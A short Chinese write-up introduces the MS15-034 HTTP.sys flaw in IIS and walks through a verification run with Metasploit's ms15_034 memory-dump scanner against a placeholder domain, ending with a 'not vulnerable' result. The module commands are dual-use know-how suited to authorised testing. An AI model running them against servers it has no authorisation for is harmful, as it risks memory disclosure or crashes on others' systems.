1.MS15-034漏洞简介
HTTP.SYS是微软从IIS6.0开始,为了在Windows平台上优化IIS服务器性能而引入的一个内核模式驱动程序。它为IIS及其他需要运用HTTP协议的微软服务器功能提供HTTP请求的接收与响应、快速缓存、提高性能、日志等功能服务。
HTTP.sys的安全漏洞,攻击者只需要发送恶意的http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃。
主要包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。
2. MS15-034漏洞验证
2.1验证环境
验证网址:www.XXX.com
验证工具:metasploit
2.2验证过程
(1)找到MS15-034漏洞模块
代码:
search ms15-034 |
结果:
(2)使用漏洞模块
代码:
use auxiliary/scanner/http/ms15_034_http_sys_memory_dump show options |
结果:
(3)设置漏洞扫描地址及参数
代码:
set RHOSTS www.XXX.com |
结果:
(4)扫描结果及分析
代码:
run(exploit) |
结果:域名返回400(错误请求)服务器不理解请求的语法,该漏洞不存在。